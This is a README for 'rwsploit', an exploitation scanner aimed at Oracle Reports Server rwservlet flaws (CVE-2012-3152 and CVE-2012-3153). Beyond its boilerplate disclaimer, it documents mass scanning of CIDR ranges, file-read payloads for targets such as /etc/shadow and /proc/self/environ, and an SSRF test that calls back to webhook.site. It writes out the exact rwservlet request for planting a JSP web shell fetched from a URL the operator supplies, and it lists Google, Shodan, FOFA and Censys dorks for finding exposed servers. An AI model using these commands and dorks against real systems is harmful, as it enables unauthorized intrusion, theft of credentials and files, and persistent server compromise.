⚠️ For authorized use only. Only run this tool against systems you own or have explicit written permission to test. Unauthorized use is illegal.
A focused exploitation scanner for Oracle Reports Server (rwservlet) targeting CVE-2012-3152 and CVE-2012-3153 — affecting versions below 11g. Automates detection, LFI file reads, SSRF testing, and JSP shell upload across single IPs, CIDR ranges, or target lists. Smart TCP/HTTP pre-filtering skips dead hosts instantly so no time is wasted.
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requestsPython 3.8+ required. No other dependencies.
python3 rwsploit.py -t <IP|CIDR> [options]
python3 rwsploit.py -f <file> [options]Run with no arguments to see the full help menu and recon dorks.
| Flag | Description | Default |
|---|---|---|
-t |
Target IP, hostname, or CIDR. Multiple values accepted. | — |
-f |
File with one IP or CIDR per line. # = comment. |
— |
-p |
Single custom port — overrides the default port list. | 80 443 8080 7777 7778 7779 8443 9090 |
-T |
Concurrent threads. | 15 |
-o |
Save LFI dumps to disk with this prefix. e.g. -o loot → loot_<ip>_<port>_<file>.txt |
stdout only |
--timeout |
Request timeout in seconds. | 10 |
--lfi |
Run LFI file-read payloads. OS is detected first so only relevant payloads run. | off |
--no-ssrf |
Skip SSRF webhook test. | off |
--shell |
Upload a JSP shell. Prompts for the URL serving your shell content. | off |
-h |
Show help and recon dorks. | — |
# Detect only
python3 rwsploit.py -t 10.10.10.55 -p 7777
# Detect + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi
# Full chain — LFI + SSRF + shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell
# Subnet scan, save dumps
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot
# From file, no SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrftargets.txt format
# comment — skipped
10.10.10.55
10.10.11.0/24
Reads world-readable files by detecting the OS first via showenv, then running only the matching payload set.
Linux — /etc/passwd, /etc/shadow, /etc/hosts, /etc/issue, /etc/os-release, /etc/group, /etc/crontab, /etc/timezone, /proc/version, /proc/cmdline, /proc/self/environ
Windows — win.ini, system32\drivers\etc\hosts, boot.ini, system.ini, AUTOEXEC.BAT
🚨 No LFI output does not mean the target is safe — Oracle's config and file permissions vary. Always test SSRF and shell upload independently.
Fires rwservlet?JOBTYPE=rwurl&URLPARAMETER=<webhook> and polls the webhook.site API for a callback. Prints the source IP, method, and User-Agent on hit. A fresh webhook token is created automatically at startup.
- Prompts for the URL serving your JSP shell content
- Reads
PATH_TRANSLATEDfromshowenvto get the real webroot path - Generates a random shell name (e.g.
kxqbrmfa.jsp) - Writes it via:
rwservlet?report=xyzzy&destype=file&desname=<webroot\shell.jsp>&JOBTYPE=rwurl&URLPARAMETER=<your URL> - Verifies by checking the shell URL for HTTP 200 and prints the live link
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet
Shodan
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"
FOFA
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"
Censys
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"
| CVE | Description |
|---|---|
| CVE-2012-3152 | Unauthenticated file read via rwservlet report parameter |
| CVE-2012-3153 | SSRF and file write via JOBTYPE=rwurl + URLPARAMETER |
Affects Oracle Reports Server 6i, 9i, 10g — fixed in 11g.
For authorized penetration testing, CTF challenges, and security research only. The author takes no responsibility for misuse.